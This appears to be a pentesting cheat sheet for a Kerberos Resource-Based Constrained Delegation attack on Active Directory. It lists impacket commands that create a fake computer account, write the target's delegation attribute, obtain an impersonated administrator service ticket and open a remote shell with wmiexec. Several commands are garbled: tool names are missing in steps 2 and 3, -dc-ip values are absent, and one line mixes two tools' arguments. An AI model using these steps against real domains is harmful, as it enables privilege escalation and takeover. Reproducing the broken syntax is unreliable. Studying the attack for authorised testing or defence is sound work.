Resource-Based Constrained Delegation Attack

Last modified: 2023-02-18

Active Directory Kerberos Windows

Kerberos RBCD attack targets a domain computer, exactly service principals related to the target domain computer.



0. Prerequisites

To achieve this attack successfully, we need the following conditions:

  • A domain account who has permission to write the computer (msDS-AllowedToActOnBehalfOfOtherIdentity property of the domain object).
  • A domain account who has permission to create a new computer.
  • LDAP (389) and SAMR (445) or LDAPS (636) access to the DC.
  • Kerberos (88) access to the DC.

1. Create Fake Computer

impacket-addcomputer -computer-name 'fakecomputer$' -computer-pass 'password' -dc-ip example.local/username:password

2. Modify Delegation Rights

We can use for abusing msDS-AllowedToActOnBehalfOfOtherIdentity property of the target. -f FAKECOMPUTER -t WEB -dc-ip example\\username:password 'example.local/fakecomputer$' -delegate-to 'fakecomputer$' -delegate-from user1 -action write -use-ldaps -k -no-pass

3. Get the Impersonated Service Ticket

Impersonated service tickets may allow high-level access to services on the target like CIFS (Common Internet File System), HTTPs, etc. -spn cifs/example.local -impersonate admin -dc-ip example.local/FAKECOMPUTER$:password

4. Use the Service Ticket

After getting the service ticket, we can use it for further pentesting.
Before doing that, we need to add the environment variable as below:

export KRB5CCNAME=`pwd`/admin.ccache

# Check by listing tickets.
# If the klist command not found, install it by `apt install krb5-user`
  • Login to Services with Kerberos Auth

    # -k: Use Kerberos Auth
    # -no-pass: No password
    impacket-wmiexec example.local/Administrator@example.local -k -no-pass